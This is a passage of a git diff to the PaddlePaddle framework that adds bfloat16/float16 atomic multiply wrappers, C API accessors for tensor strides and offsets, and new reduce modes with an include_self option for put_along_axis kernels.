+ do { + assumed = old; + old = atomicCAS(address_as_ui, assumed, mul_to_high_half(assumed, val_f)); + } while (old != assumed); + phi::dtype::float16 ret; + ret.x = old >> 16; + return ret; + } +} +#endif + +inline static __device__ uint32_t bf16_mul_to_low_half(uint32_t val, float x) { + phi::dtype::bfloat16 low_half; + // The bfloat16 in lower 16bits + low_half.x = static_cast<uint16_t>(val & 0xFFFFu); + low_half = + static_cast<phi::dtype::bfloat16>(static_cast<float>(low_half) * x); + return (val & 0xFFFF0000u) | low_half.x; +} + +inline static __device__ uint32_t bf16_mul_to_high_half(uint32_t val, float x) { + phi::dtype::bfloat16 high_half; + // The bfloat16 in higher 16bits + high_half.x = static_cast<uint16_t>(val >> 16); + high_half = + static_cast<phi::dtype::bfloat16>(static_cast<float>(high_half) * x); + return (val & 0xFFFFu) | (static_cast<uint32_t>(high_half.x) << 16); +} + +CUDA_ATOMIC_WRAPPER(Mul, phi::dtype::bfloat16) { + uint32_t *address_as_ui = reinterpret_cast<uint32_t *>( + reinterpret_cast<char *>(address) - + (reinterpret_cast<uintptr_t>(address) & 0x02)); + float val_f = static_cast<float>(val); + uint32_t old = *address_as_ui; + uint32_t assumed; + if (((uintptr_t)address & 0x02) == 0) { + // The bfloat16 value stays at the lower 16 bits of the address. + do { + assumed = old; + old = atomicCAS( + address_as_ui, assumed, bf16_mul_to_low_half(assumed, val_f)); + } while (old != assumed); + phi::dtype::bfloat16 ret; + ret.x = old & 0xFFFFu; + return ret; + } else { + // The bfloat16 value stays at the higher 16 bits of the address. + do { + assumed = old; + old = atomicCAS( + address_as_ui, assumed, bf16_mul_to_high_half(assumed, val_f)); + } while (old != assumed); + phi::dtype::bfloat16 ret; + ret.x = old >> 16; + return ret; + } +} + // For atomicMax USE_CUDA_ATOMIC(Max, int); USE_CUDA_ATOMIC(Max, unsigned int); diff --git a/paddle/phi/capi/include/c_meta_tensor.h b/paddle/phi/capi/include/c_meta_tensor.h index 08f01084c6abf3..f4c9a541e526aa 100644 --- a/paddle/phi/capi/include/c_meta_tensor.h +++ b/paddle/phi/capi/include/c_meta_tensor.h @@ -39,6 +39,13 @@ int64_t PD_MetaTensorGetDim(const PD_MetaTensor *tensor, size_t index, PD_Status *status); +int64_t PD_MetaTensorGetNumStrides(const PD_MetaTensor *tensor, + PD_Status *status); + +int64_t PD_MetaTensorGetStride(const PD_MetaTensor *tensor, + size_t index, + PD_Status *status); + bool PD_MetaTensorIsValid(const PD_MetaTensor *tensor, PD_Status *status); void PD_MetaTensorSetDims(PD_MetaTensor *tensor, @@ -46,6 +53,11 @@ void PD_MetaTensorSetDims(PD_MetaTensor *tensor, const int64_t *dims, PD_Status *status); +void PD_MetaTensorSetStrides(PD_MetaTensor *tensor, + int64_t nstrides, + const int64_t *strides, + PD_Status *status); + void PD_MetaTensorSetDataType(PD_MetaTensor *tensor, PD_DataType dtype, PD_Status *status); diff --git a/paddle/phi/capi/include/c_tensor.h b/paddle/phi/capi/include/c_tensor.h index c4f706c70ccfb4..2df292c6b946b2 100644 --- a/paddle/phi/capi/include/c_tensor.h +++ b/paddle/phi/capi/include/c_tensor.h @@ -41,6 +41,12 @@ int64_t PD_TensorGetDim(const PD_Tensor *tensor, size_t index, PD_Status *status); +int64_t PD_TensorGetNumStrides(const PD_Tensor *tensor, PD_Status *status); + +int64_t PD_TensorGetStride(const PD_Tensor *tensor, + size_t index, + PD_Status *status); + void PD_TensorGetLoD(const PD_Tensor *tensor, PD_List *data, PD_List *offset, @@ -52,11 +58,22 @@ bool PD_TensorIsValid(const PD_Tensor *tensor, PD_Status *status); void *PD_TensorGetHolder(const PD_Tensor *tensor, PD_Status *status); +size_t PD_TensorGetOffset(const PD_Tensor *tensor, PD_Status *status); + void PD_TensorSetDims(PD_Tensor *tensor,
int64_t ndims, const int64_t *dims, PD_Status *status); +void PD_TensorSetOffset(PD_Tensor *tensor, + const int64_t offset, + PD_Status *status); + +void PD_TensorSetStrides(PD_Tensor *tensor, + int64_t nstrides, + const int64_t *strides, + PD_Status *status); + void PD_TensorSetDataType(PD_Tensor *tensor, PD_DataType dtype, PD_Status *status); diff --git a/paddle/phi/capi/include/wrapper_base.h b/paddle/phi/capi/include/wrapper_base.h index 061561008a95e7..75f3e2d9e350eb 100644 --- a/paddle/phi/capi/include/wrapper_base.h +++ b/paddle/phi/capi/include/wrapper_base.h @@ -72,6 +72,19 @@ inline std::vector PD_TensorGetDims(PD_Tensor* tensor, return std::vector(); } +inline std::vector PD_TensorGetStrides(PD_Tensor* tensor, + PD_Status* status) { + int64_t nstrides = PD_TensorGetNumStrides(tensor, status); + if (nstrides > 0) { + std::vector shape(nstrides); + for (int64_t i = 0; i < nstrides; ++i) { + shape[i] = PD_TensorGetStride(tensor, i, status); + } + return shape; + } + return std::vector(); +} + inline std::vector PD_MetaTensorGetDims(PD_MetaTensor* tensor, PD_Status* status) { int64_t ndims = PD_MetaTensorGetNumDims(tensor, status); @@ -85,6 +98,19 @@ inline std::vector PD_MetaTensorGetDims(PD_MetaTensor* tensor, return std::vector(); } +inline std::vector PD_MetaTensorGetStrides(PD_MetaTensor* tensor, + PD_Status* status) { + int64_t nstrides = PD_MetaTensorGetNumStrides(tensor, status); + if (nstrides > 0) { + std::vector shape(nstrides); + for (int64_t i = 0; i < nstrides; ++i) { + shape[i] = PD_MetaTensorGetStride(tensor, i, status); + } + return shape; + } + return std::vector(); +} + template class WrapperBase { public: @@ -134,6 +160,13 @@ class DenseTensor : public WrapperBase { return holder; } + size_t offset() const { + C_Status status; + auto offset = PD_TensorGetOffset(raw_data(), &status); + PD_CHECK_STATUS(status); + return offset; + } + std::vector dims() const { C_Status status; auto dimension = PD_TensorGetDims(raw_data(), &status); @@ -141,6 +174,13 @@ class DenseTensor : public WrapperBase { return dimension; } + std::vector strides() const { + C_Status status; + auto strides = PD_TensorGetStrides(raw_data(), &status); + PD_CHECK_STATUS(status); + return strides; + } + PD_DataType dtype() const { C_Status status; auto data_type = PD_TensorGetPDDataType(raw_data(), &status); @@ -207,6 +247,18 @@ class DenseTensor : public WrapperBase { PD_CHECK_STATUS(status); } + void set_offset(const int64_t& offset) { + C_Status status; + PD_TensorSetOffset(raw_data(), offset, &status); + PD_CHECK_STATUS(status); + } + + void set_strides(const std::vector& strides) { + C_Status status; + PD_TensorSetStrides(raw_data(), strides.size(), strides.data(), &status); + PD_CHECK_STATUS(status); + } + void set_dtype(PD_DataType data_type) { C_Status status; PD_TensorSetDataType(raw_data(), data_type, &status); @@ -513,6 +565,13 @@ class MetaTensor : WrapperBase { return dimension; } + std::vector strides() const { + C_Status status; + auto strides = PD_MetaTensorGetStrides(raw_data(), &status); + PD_CHECK_STATUS(status); + return strides; + } + PD_DataType dtype() const { C_Status status; auto data_type = PD_MetaTensorGetPDDataType(raw_data(), &status); @@ -540,6 +599,13 @@ class MetaTensor : WrapperBase { PD_CHECK_STATUS(status); } + void set_strides(const std::vector& strides) { + C_Status status; + PD_MetaTensorSetStrides( + raw_data(), strides.size(), strides.data(), &status); + PD_CHECK_STATUS(status); + } + void set_dtype(PD_DataType data_type) { C_Status status; 
PD_MetaTensorSetDataType(raw_data(), data_type, &status); diff --git a/paddle/phi/capi/lib/c_meta_tensor.cc b/paddle/phi/capi/lib/c_meta_tensor.cc index 6ea6eda1a7f23e..f436ba9d3cde0d 100644 --- a/paddle/phi/capi/lib/c_meta_tensor.cc +++ b/paddle/phi/capi/lib/c_meta_tensor.cc @@ -88,6 +88,36 @@ int64_t PD_MetaTensorGetDim(const PD_MetaTensor *tensor, return cc_tensor->dims()[index]; } +int64_t PD_MetaTensorGetNumStrides(const PD_MetaTensor *tensor, + PD_Status *status) { + if (status) { + if (!tensor) { + *status = C_FAILED; + return 0; + } + *status = C_SUCCESS; + } + + auto cc_tensor = reinterpret_cast(tensor); + return cc_tensor->strides().size(); +} + +int64_t PD_MetaTensorGetStride(const PD_MetaTensor *tensor, + size_t index, + PD_Status *status) { + auto cc_tensor = reinterpret_cast(tensor); + + if (status) { + if (!tensor || index >= static_cast(cc_tensor->strides().size())) { + *status = C_FAILED; + return 0; + } + *status = C_SUCCESS; + } + + return cc_tensor->strides()[index]; +} + bool PD_MetaTensorIsValid(const PD_MetaTensor *tensor, PD_Status *status) { if (status) { if (!tensor) { @@ -117,6 +147,22 @@ void PD_MetaTensorSetDims(PD_MetaTensor *tensor, cc_tensor->set_dims(common::make_ddim(shape)); } +void PD_MetaTensorSetStrides(PD_MetaTensor *tensor, + int64_t nstrides, + const int64_t *strides, + PD_Status *status) { + if (status) { + if (!tensor) { + *status = C_FAILED; + return; + } + *status = C_SUCCESS; + } + auto cc_tensor = reinterpret_cast(tensor); + std::vector shape(strides, strides + nstrides); + cc_tensor->set_strides(common::make_ddim(shape)); +} + void PD_MetaTensorSetDataType(PD_MetaTensor *tensor, PD_DataType dtype, PD_Status *status) { diff --git a/paddle/phi/capi/lib/c_tensor.cc b/paddle/phi/capi/lib/c_tensor.cc index 31a724447b7c7f..eb8c8c6f4eb47d 100644 --- a/paddle/phi/capi/lib/c_tensor.cc +++ b/paddle/phi/capi/lib/c_tensor.cc @@ -111,6 +111,35 @@ int64_t PD_TensorGetDim(const PD_Tensor* tensor, return cc_tensor->dims()[index]; } +int64_t PD_TensorGetNumStrides(const PD_Tensor* tensor, PD_Status* status) { + if (status) { + if (!tensor) { + *status = C_FAILED; + return 0; + } + *status = C_SUCCESS; + } + + auto cc_tensor = reinterpret_cast(tensor); + return cc_tensor->strides().size(); +} + +int64_t PD_TensorGetStride(const PD_Tensor* tensor, + size_t index, + PD_Status* status) { + auto cc_tensor = reinterpret_cast(tensor); + + if (status) { + if (!tensor || index >= static_cast(cc_tensor->strides().size())) { + *status = C_FAILED; + return 0; + } + *status = C_SUCCESS; + } + + return cc_tensor->strides()[index]; +} + void PD_TensorGetLoD(const PD_Tensor* tensor, PD_List* data, PD_List* offset, @@ -185,6 +214,19 @@ void* PD_TensorGetHolder(const PD_Tensor* tensor, PD_Status* status) { return cc_tensor->Holder().get(); } +size_t PD_TensorGetOffset(const PD_Tensor* tensor, PD_Status* status) { + if (status) { + if (!tensor) { + *status = C_FAILED; + return 0; + } + *status = C_SUCCESS; + } + + auto cc_tensor = reinterpret_cast(tensor); + return cc_tensor->offset(); +} + void PD_TensorSetDims(PD_Tensor* tensor, int64_t ndims, const int64_t* dims, @@ -201,6 +243,36 @@ void PD_TensorSetDims(PD_Tensor* tensor, cc_tensor->Resize(common::make_ddim(shape)); } +void PD_TensorSetOffset(PD_Tensor* tensor, + const int64_t offset, + PD_Status* status) { + if (status) { + if (!tensor) { + *status = C_FAILED; + return; + } + *status = C_SUCCESS; + } + auto cc_tensor = reinterpret_cast(tensor); + cc_tensor->set_offset(offset); +} + +void PD_TensorSetStrides(PD_Tensor* 
tensor, + int64_t nstrides, + const int64_t* strides, + PD_Status* status) { + if (status) { + if (!tensor) { + *status = C_FAILED; + return; + } + *status = C_SUCCESS; + } + auto cc_tensor = reinterpret_cast(tensor); + std::vector shape(strides, strides + nstrides); + cc_tensor->set_strides(common::make_ddim(shape)); +} + void PD_TensorSetDataType(PD_Tensor* tensor, PD_DataType dtype, PD_Status* status) { diff --git a/paddle/phi/core/generator.cc b/paddle/phi/core/generator.cc index a2fe426b0ec47b..978552e13c0e8a 100644 --- a/paddle/phi/core/generator.cc +++ b/paddle/phi/core/generator.cc @@ -278,7 +278,7 @@ uint64_t Generator::Random64() { std::pair Generator::IncrementOffset( uint64_t increment_offset) { -#if defined(PADDLE_WITH_CUDA) || defined(PADDLE_WITH_HIP) || defined(PADDLE_WITH_MUSA) +#if defined(PADDLE_WITH_CUDA) || defined(PADDLE_WITH_HIP) || defined(PADDLE_WITH_MUSA) || defined(PADDLE_WITH_CUSTOM_DEVICE) std::lock_guard lock(this->mu_); uint64_t cur_offset = this->state_.thread_offset; VLOG(10) << "cur_offset = " << cur_offset diff --git a/paddle/phi/core/visit_type.h b/paddle/phi/core/visit_type.h index 6c61c3964b52d6..296db9b1781987 100644 --- a/paddle/phi/core/visit_type.h +++ b/paddle/phi/core/visit_type.h @@ -355,7 +355,7 @@ namespace phi { "`"); \ } \ }() -#if defined(PADDLE_WITH_XPU) +#if defined(PADDLE_WITH_XPU) || defined(PADDLE_WITH_HIP) #define PD_VISIT_ALL_TYPES(TYPE, NAME, ...) \ [&] { \ const auto& __dtype__ = TYPE; \ diff --git a/paddle/phi/kernels/CMakeLists.txt b/paddle/phi/kernels/CMakeLists.txt index 2df3f34b57936c..6432dc19f768e9 100644 --- a/paddle/phi/kernels/CMakeLists.txt +++ b/paddle/phi/kernels/CMakeLists.txt @@ -77,6 +77,8 @@ if(WITH_MUSA) "selected_rows/gpu/clip_by_norm_kernel.cu" "gpu/softmax_grad_kernel.cu" "gpu/softmax_kernel.cu" + "gpu/put_along_axis_grad_kernel.cu" + "gpu/put_along_axis_kernel.cu" ) endif() @@ -217,6 +219,32 @@ if(NOT WITH_CUDNN_FRONTEND) "fusion/gpu/fused_dconv_drelu_dbn_kernel.cu") endif() +# Note(qili93): remove kernels not supported on DCU yet +if(WITH_ROCM) + list( + REMOVE_ITEM + kernel_cu + "gpu/affine_grid_grad_kernel.cu" + "gpu/apply_per_channel_scale_kernel.cu" + "gpu/cholesky_solve_kernel.cu" + "gpu/eigh_kernel.cu" + "gpu/eigvalsh_kernel.cu" + "gpu/lstsq_kernel.cu" + "gpu/lu_kernel.cu" + "gpu/matrix_rank_kernel.cu" + "gpu/matrix_rank_tol_kernel.cu" + "gpu/multiclass_nms3_kernel.cu" + "gpu/put_along_axis_grad_kernel.cu" + "gpu/put_along_axis_kernel.cu" + "gpu/qr_kernel.cu" + "gpu/svd_kernel.cu" + "gpudnn/mha_cudnn_frontend.cu" + "fusion/gpu/block_multi_head_attention_kernel.cu" + "fusion/gpu/fused_bn_add_activation_grad_kernel.cu" + "fusion/gpu/fused_bn_add_activation_kernel.cu" + "fusion/gpu/fusion_transpose_flatten_concat_kernel.cu") +endif() + set(cc_search_pattern "*.cc" "cpu/*.cc" @@ -243,6 +271,10 @@ if(WITH_MKLDNN) "fusion/onednn/*.cc") endif() +if(WITH_CUSTOM_DEVICE) + set(cc_search_pattern ${cc_search_pattern} "custom/*.cc") +endif() + file( GLOB kernel_cc RELATIVE "${CMAKE_CURRENT_SOURCE_DIR}" diff --git a/paddle/phi/kernels/cpu/cum_maxmin_grad_kernel.cc b/paddle/phi/kernels/cpu/cum_maxmin_grad_kernel.cc index acd84a80be2ad1..47e804b7de2775 100644 --- a/paddle/phi/kernels/cpu/cum_maxmin_grad_kernel.cc +++ b/paddle/phi/kernels/cpu/cum_maxmin_grad_kernel.cc @@ -38,10 +38,10 @@ void CummaxGradKernel(const Context& dev_ctx, } if (dtype == DataType::INT32) { phi::funcs::cpu_scatter_add_kernel( - *x_grad, axis, indices, out_grad, dev_ctx); + *x_grad, axis, indices, out_grad, true, dev_ctx); } else if (dtype == 
DataType::INT64) { phi::funcs::cpu_scatter_add_kernel( - *x_grad, axis, indices, out_grad, dev_ctx); + *x_grad, axis, indices, out_grad, true, dev_ctx); } } @@ -61,10 +61,10 @@ void CumminGradKernel(const Context& dev_ctx, } if (dtype == DataType::INT32) { phi::funcs::cpu_scatter_add_kernel( - *x_grad, axis, indices, out_grad, dev_ctx); + *x_grad, axis, indices, out_grad, true, dev_ctx); } else if (dtype == DataType::INT64) { phi::funcs::cpu_scatter_add_kernel( - *x_grad, axis, indices, out_grad, dev_ctx); + *x_grad, axis, indices, out_grad, true, dev_ctx); } } diff --git a/paddle/phi/kernels/cpu/put_along_axis_grad_kernel.cc b/paddle/phi/kernels/cpu/put_along_axis_grad_kernel.cc index dd7b762849d16b..aeb2071b136de8 100644 --- a/paddle/phi/kernels/cpu/put_along_axis_grad_kernel.cc +++ b/paddle/phi/kernels/cpu/put_along_axis_grad_kernel.cc @@ -25,11 +25,14 @@ namespace phi { template void PutAlongAxisGradKernel(const Context& dev_ctx, - const DenseTensor& x UNUSED, + const DenseTensor& x, const DenseTensor& index, + const DenseTensor& value, + const DenseTensor& out, const DenseTensor& out_grad, int axis, - const std::string& reduce UNUSED, + const std::string& reduce, + bool include_self, DenseTensor* x_grad, DenseTensor* value_grad) { PADDLE_ENFORCE_EQ( @@ -40,31 +43,135 @@ void PutAlongAxisGradKernel(const Context& dev_ctx, const auto& index_type = index.dtype(); if (x_grad) { phi::Copy(dev_ctx, out_grad, dev_ctx.GetPlace(), false, x_grad); - if (index_type == DataType::INT32) { - phi::funcs::cpu_scatter_input_grad_kernel( - // Here passing an unused argument out_grad, because it's - // convenient to instantiate a bunch of template function with the - // same arguments list. - out_grad, - axis, - index, - *x_grad, - dev_ctx); - } else { - phi::funcs::cpu_scatter_input_grad_kernel( - out_grad, axis, index, *x_grad, dev_ctx); + if (include_self == false || reduce == "assign") { + if (index_type == DataType::INT32) { + phi::funcs::cpu_scatter_input_grad_kernel( + // Here passing an unused argument out_grad, because it's + // convenient to instantiate a bunch of template function with the + // same arguments list. + out_grad, + axis, + index, + *x_grad, + include_self, + dev_ctx); + } else { + phi::funcs::cpu_scatter_input_grad_kernel( + out_grad, axis, index, *x_grad, include_self, dev_ctx); + } + } else if (reduce == "multiply" || reduce == "mul" || reduce == "amin" || + reduce == "amax") { + if (index_type == DataType::INT32) { + phi::funcs::cpu_scatter_mul_min_max_input_grad_kernel( + out_grad, + axis, + index, + out, + x, + value, + *x_grad, + reduce, + include_self, + dev_ctx); + } else { + phi::funcs::cpu_scatter_mul_min_max_input_grad_kernel( + out_grad, + axis, + index, + out, + x, + value, + *x_grad, + reduce, + include_self, + dev_ctx); + } + } else if (reduce == "mean") { + if (index_type == DataType::INT32) { + phi::funcs::cpu_scatter_mean_input_grad_kernel( + // Here passing an unused argument out_grad, because it's + // convenient to instantiate a bunch of template function with the + // same arguments list. 
+ out_grad, + axis, + index, + *x_grad, + include_self, + dev_ctx); + } else { + phi::funcs::cpu_scatter_mean_input_grad_kernel( + out_grad, axis, index, *x_grad, include_self, dev_ctx); + } } } if (value_grad) { value_grad->Resize(index.dims()); dev_ctx.template Alloc(value_grad); - if (index_type == DataType::INT32) { - phi::funcs::cpu_scatter_value_grad_kernel( - out_grad, axis, index, *value_grad, dev_ctx); - } else { - phi::funcs::cpu_scatter_value_grad_kernel( - out_grad, axis, index, *value_grad, dev_ctx); + auto* grad_data = value_grad->data(); + int64_t grad_size = value_grad->numel(); + memset(grad_data, 0, sizeof(T) * grad_size); + if (reduce == "assign") { + if (index_type == DataType::INT32) { + phi::funcs::cpu_scatter_value_grad_kernel( + out_grad, axis, index, *value_grad, include_self, dev_ctx); + } else if (index_type == DataType::INT64) { + phi::funcs::cpu_scatter_value_grad_kernel( + out_grad, axis, index, *value_grad, include_self, dev_ctx); + } + } else if (reduce == "add" || reduce == "mean") { + if (index_type == DataType::INT32) { + phi::funcs::cpu_scatter_add_mean_value_grad_kernel( + out_grad, + axis, + index, + out, + x, + value, + *value_grad, + reduce, + include_self, + dev_ctx); + } else { + phi::funcs::cpu_scatter_add_mean_value_grad_kernel( + out_grad, + axis, + index, + out, + x, + value, + *value_grad, + reduce, + include_self, + dev_ctx); + } + } else if (reduce == "mul" || reduce == "multiply" || reduce == "amin" || + reduce == "amax") { + if (index_type == DataType::INT32) { + phi::funcs::cpu_scatter_mul_min_max_value_grad_kernel( + out_grad, + axis, + index, + out, + x, + value, + *value_grad, + reduce, + include_self, + dev_ctx); + } else { + phi::funcs::cpu_scatter_mul_min_max_value_grad_kernel( + out_grad, + axis, + index, + out, + x, + value, + *value_grad, + reduce, + include_self, + dev_ctx); + } } } } diff --git a/paddle/phi/kernels/cpu/put_along_axis_kernel.cc b/paddle/phi/kernels/cpu/put_along_axis_kernel.cc index 5417f9463a62f8..4411755d61cbaf 100644 --- a/paddle/phi/kernels/cpu/put_along_axis_kernel.cc +++ b/paddle/phi/kernels/cpu/put_along_axis_kernel.cc @@ -30,6 +30,7 @@ void PutAlongAxisKernel(const Context& dev_ctx, const DenseTensor& value, int axis, const std::string& reduce, + bool include_self, DenseTensor* out) { PADDLE_ENFORCE_EQ( dev_ctx.GetPlace().GetType() == phi::AllocationType::CPU, @@ -41,31 +42,56 @@ void PutAlongAxisKernel(const Context& dev_ctx, if (reduce == "add") { if (index_type == DataType::INT32) { phi::funcs::cpu_scatter_add_kernel( - *out, axis, index, value, dev_ctx); + *out, axis, index, value, include_self, dev_ctx); } else if (index_type == DataType::INT64) { phi::funcs::cpu_scatter_add_kernel( - *out, axis, index, value, dev_ctx); + *out, axis, index, value, include_self, dev_ctx); } } else if (reduce == "multiply" || reduce == "mul") { if (index_type == DataType::INT32) { phi::funcs::cpu_scatter_mul_kernel( - *out, axis, index, value, dev_ctx); + *out, axis, index, value, include_self, dev_ctx); } else if (index_type == DataType::INT64) { phi::funcs::cpu_scatter_mul_kernel( - *out, axis, index, value, dev_ctx); + *out, axis, index, value, include_self, dev_ctx); } } else if (reduce == "assign") { if (index_type == DataType::INT32) { phi::funcs::cpu_scatter_assign_kernel( - *out, axis, index, value, dev_ctx); + *out, axis, index, value, include_self, dev_ctx); } else if (index_type == DataType::INT64) { phi::funcs::cpu_scatter_assign_kernel( - *out, axis, index, value, dev_ctx); + *out, axis, index, value, 
include_self, dev_ctx); + } + } else if (reduce == "mean") { + if (index_type == DataType::INT32) { + phi::funcs::cpu_scatter_mean_kernel( + *out, axis, index, value, include_self, dev_ctx); + } else if (index_type == DataType::INT64) { + phi::funcs::cpu_scatter_mean_kernel( + *out, axis, index, value, include_self, dev_ctx); + } + } else if (reduce == "amax") { + if (index_type == DataType::INT32) { + phi::funcs::cpu_scatter_max_kernel( + *out, axis, index, value, include_self, dev_ctx); + } else if (index_type == DataType::INT64) { + phi::funcs::cpu_scatter_max_kernel( + *out, axis, index, value, include_self, dev_ctx); + } + } else if (reduce == "amin") { + if (index_type == DataType::INT32) { + phi::funcs::cpu_scatter_min_kernel( + *out, axis, index, value, include_self, dev_ctx); + } else if (index_type == DataType::INT64) { + phi::funcs::cpu_scatter_min_kernel( + *out, axis, index, value, include_self, dev_ctx); } } else { PADDLE_THROW(errors::InvalidArgument( "can not support reduce: '%s' for scatter kernel, only " - "support reduce op: 'add', 'assign', 'mul' and 'multiply', the " + "support reduce op: 'add', 'assign', 'mul', 'mean', 'amin', 'amax' and " + "'multiply', the " "default reduce " "op is 'assign' ", reduce)); diff --git a/paddle/phi/kernels/cpu/repeat_interleave_grad_kernel.cc b/paddle/phi/kernels/cpu/repeat_interleave_grad_kernel.cc index b7b33d4290daec..66f3ef0cd790d1 100644 --- a/paddle/phi/kernels/cpu/repeat_interleave_grad_kernel.cc +++ b/paddle/phi/kernels/cpu/repeat_interleave_grad_kernel.cc @@ -104,7 +104,8 @@ PD_REGISTER_KERNEL(repeat_interleave_with_tensor_index_grad, float, double, int, - int64_t) {} + int64_t, + phi::dtype::bfloat16) {} PD_REGISTER_KERNEL(repeat_interleave_grad, CPU, @@ -113,4 +114,5 @@ PD_REGISTER_KERNEL(repeat_interleave_grad, float, double, int, - int64_t) {} + int64_t, + phi::dtype::bfloat16) {} diff --git a/paddle/phi/kernels/cpu/repeat_interleave_kernel.cc b/paddle/phi/kernels/cpu/repeat_interleave_kernel.cc index 388e243eff42a0..8b00d7e38f304c 100644 --- a/paddle/phi/kernels/cpu/repeat_interleave_kernel.cc +++ b/paddle/phi/kernels/cpu/repeat_interleave_kernel.cc @@ -25,7 +25,8 @@ PD_REGISTER_KERNEL(repeat_interleave, float, double, int, - int64_t) {} + int64_t, + phi::dtype::bfloat16) {} PD_REGISTER_KERNEL(repeat_interleave_with_tensor_index, CPU, @@ -34,4 +35,5 @@ PD_REGISTER_KERNEL(repeat_interleave_with_tensor_index, float, double, int, - int64_t) {} + int64_t, + phi::dtype::bfloat16) {} diff --git a/paddle/phi/kernels/cpu/set_value_grad_kernel.cc b/paddle/phi/kernels/cpu/set_value_grad_kernel.cc index ed35513d985505..237a892dbb356c 100644 --- a/paddle/phi/kernels/cpu/set_value_grad_kernel.cc +++ b/paddle/phi/kernels/cpu/set_value_grad_kernel.cc @@ -35,3 +35,20 @@ PD_REGISTER_KERNEL(set_value_grad, phi::dtype::float16, phi::dtype::complex, phi::dtype::complex) {} + +PD_REGISTER_KERNEL(set_value_with_scalar_grad, + CPU, + ALL_LAYOUT, + phi::SetValueWithScalarGradKernel, + float, + double, + int, + int64_t, + bool, + int16_t, + uint8_t, + int8_t, + phi::dtype::bfloat16, + phi::dtype::float16, + phi::dtype::complex, + phi::dtype::complex) {} diff --git a/paddle/phi/kernels/cpu/take_along_axis_grad_kernel.cc b/paddle/phi/kernels/cpu/take_along_axis_grad_kernel.cc index 8a7238203ec647..4e5fc0c305100c 100644 --- a/paddle/phi/kernels/cpu/take_along_axis_grad_kernel.cc +++ b/paddle/phi/kernels/cpu/take_along_axis_grad_kernel.cc @@ -50,10 +50,11 @@ void TakeAlongAxisGradKernel(const Context& dev_ctx, axis, index, out_grad, + true, dev_ctx); 
// the gradient of gather is scatter } else if (index_type == phi::DataType::INT64) { phi::funcs::cpu_scatter_add_kernel( - *x_grad, axis, index, out_grad, dev_ctx); + *x_grad, axis, index, out_grad, true, dev_ctx); } } diff --git a/paddle/phi/kernels/cpu/take_along_axis_kernel.cc b/paddle/phi/kernels/cpu/take_along_axis_kernel.cc index d1b4a24b54eba5..d006f688ae2434 100644 --- a/paddle/phi/kernels/cpu/take_along_axis_kernel.cc +++ b/paddle/phi/kernels/cpu/take_along_axis_kernel.cc @@ -38,9 +38,11 @@ void TakeAlongAxisKernel(const Context& dev_ctx, const auto& index_type = index.dtype(); if (index_type == DataType::INT32) { - phi::funcs::cpu_gather_kernel(x, axis, index, *out, dev_ctx); + phi::funcs::cpu_gather_kernel( + x, axis, index, *out, true, dev_ctx); } else if (index_type == DataType::INT64) { - phi::funcs::cpu_gather_kernel(x, axis, index, *out, dev_ctx); + phi::funcs::cpu_gather_kernel( + x, axis, index, *out, true, dev_ctx); } } diff --git a/paddle/phi/kernels/custom/c_embedding_grad_kernel.cc b/paddle/phi/kernels/custom/c_embedding_grad_kernel.cc new file mode 100644 index 00000000000000..ff61688513b139 --- /dev/null +++ b/paddle/phi/kernels/custom/c_embedding_grad_kernel.cc @@ -0,0 +1,93 @@ +// Copyright (c) 2023 PaddlePaddle Authors. All Rights Reserved. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. 
+ +#include "paddle/phi/kernels/c_embedding_grad_kernel.h" +#include "glog/logging.h" +#include "paddle/phi/api/backward/backward_api.h" +#include "paddle/phi/api/include/api.h" +#include "paddle/phi/backends/all_context.h" +#include "paddle/phi/common/float16.h" +#include "paddle/phi/core/kernel_registry.h" + +namespace phi { + +#ifdef PADDLE_WITH_CUSTOM_DEVICE +template +void CEmbeddingGradKernel(const Context& dev_ctx, + const DenseTensor& w, + const DenseTensor& ids, + const DenseTensor& out_grad, + int64_t start_index, + DenseTensor* w_grad) { + w_grad->Resize(w.dims()); + dev_ctx.template Alloc(w_grad, w.dtype()); + const auto& index_type = ids.dtype(); + if (index_type == phi::DataType::INT32 || + index_type == phi::DataType::INT64) { + auto K = ids.numel(); + auto N = w.dims()[0]; + auto D = w.dims()[1]; + + auto x_tmp = std::make_shared(); + x_tmp->ShareDataWith(ids).Resize({K}); + auto w_tmp = std::make_shared(); + w_tmp->set_meta(w.meta()); + dev_ctx.Alloc(w_tmp.get(), w_tmp->dtype()); + auto out_grad_tmp = std::make_shared(); + out_grad_tmp->ShareDataWith(out_grad).Resize({K, D}); + paddle::Tensor x_tensor(x_tmp), w_tensor(w_tmp), + out_grad_tensor(out_grad_tmp); + + auto start_index_tensor = paddle::experimental::full_like( + x_tensor, start_index, x_tensor.dtype(), x_tensor.place()); + auto end_index_tensor = paddle::experimental::full_like( + x_tensor, start_index + N, x_tensor.dtype(), x_tensor.place()); + auto ids_mask_tensor = paddle::experimental::logical_and( + x_tensor.greater_equal(start_index_tensor), + x_tensor.less_than(end_index_tensor)); + auto real_ids_tensor = (x_tensor - start_index_tensor) + .multiply(paddle::experimental::cast( + ids_mask_tensor, x_tensor.dtype())); + auto out_grad_tensor_mul_mask = + paddle::experimental::reshape(out_grad_tensor, {K, D}) + .multiply(paddle::experimental::reshape( + paddle::experimental::cast(ids_mask_tensor, w.dtype()), + {K, 1})); + paddle::Tensor w_grad_tensor; + paddle::experimental::embedding_grad(real_ids_tensor, + w_tensor, + out_grad_tensor_mul_mask, + -1, + false, + &w_grad_tensor); + w_grad->ShareDataWith( + *reinterpret_cast(w_grad_tensor.impl().get())); + + } else { + PADDLE_THROW(phi::errors::Unavailable( + "Custom Device c_embedding_grad ids only support int32 or int64.")); + } +} +#endif +} // namespace phi + +#ifdef PADDLE_WITH_CUSTOM_DEVICE +PD_REGISTER_KERNEL(c_embedding_grad, + Custom, + ALL_LAYOUT, + phi::CEmbeddingGradKernel, + float, + phi::dtype::float16, + phi::dtype::bfloat16) {} +#endif diff --git a/paddle/phi/kernels/custom/c_embedding_kernel.cc b/paddle/phi/kernels/custom/c_embedding_kernel.cc new file mode 100644 index 00000000000000..0cacf61d46f3a8 --- /dev/null +++ b/paddle/phi/kernels/custom/c_embedding_kernel.cc @@ -0,0 +1,84 @@ +// Copyright (c) 2023 PaddlePaddle Authors. All Rights Reserved. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you 